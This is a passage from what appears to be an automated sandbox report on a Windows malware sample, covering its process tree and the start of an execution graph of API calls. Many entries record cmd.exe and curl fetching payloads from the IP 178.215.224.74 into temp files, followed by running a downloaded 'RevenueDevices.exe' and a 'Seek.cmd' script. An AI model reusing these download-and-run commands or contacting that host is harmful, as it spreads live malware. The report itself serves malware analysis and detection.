                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:73
                                      Start time:06:05:24
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:74
                                      Start time:06:05:24
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:75
                                      Start time:06:05:24
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:76
                                      Start time:06:05:26
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:77
                                      Start time:06:05:26
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:78
                                      Start time:06:05:26
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:79
                                      Start time:06:05:27
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:80
                                      Start time:06:05:27
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:81
                                      Start time:06:05:28
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:82
                                      Start time:06:05:29
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:83
                                      Start time:06:05:29
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:84
                                      Start time:06:05:29
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:85
                                      Start time:06:05:31
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:86
                                      Start time:06:05:31
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:87
                                      Start time:06:05:31
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:88
                                      Start time:06:05:38
                                      Start date:24/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
                                      Imagebase:0x400000
                                      File size:1'151'988 bytes
                                      MD5 hash:B487B5B51436B42576D60A1FE58F8399
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 62%, ReversingLabs
                                      Has exited:true

                                      Target ID:89
                                      Start time:06:05:38
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:90
                                      Start time:06:05:38
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:91
                                      Start time:06:05:39
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:92
                                      Start time:06:05:40
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:93
                                      Start time:06:05:40
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:94
                                      Start time:06:05:40
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:95
                                      Start time:06:05:40
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:96
                                      Start time:06:05:41
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:97
                                      Start time:06:05:43
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:98
                                      Start time:06:05:43
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:99
                                      Start time:06:05:43
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:191
                                      Start time:06:06:16
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:215
                                      Start time:06:06:22
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:227
                                      Start time:06:06:24
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:281
                                      Start time:06:06:37
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:302
                                      Start time:06:06:41
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:317
                                      Start time:06:06:45
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:332
                                      Start time:06:06:48
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7ae440000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:359
                                      Start time:06:06:53
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:371
                                      Start time:06:06:55
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:392
                                      Start time:06:06:59
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:395
                                      Start time:06:07:00
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:422
                                      Start time:06:07:05
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:428
                                      Start time:06:07:06
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:445
                                      Start time:06:07:10
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:452
                                      Start time:06:07:10
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:461
                                      Start time:06:07:12
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:464
                                      Start time:06:07:12
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\Conhost.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:
                                      Has administrator privileges:
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:17.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:21%
                                        Total number of Nodes:1482
                                        Total number of Limit Nodes:25
                                        execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 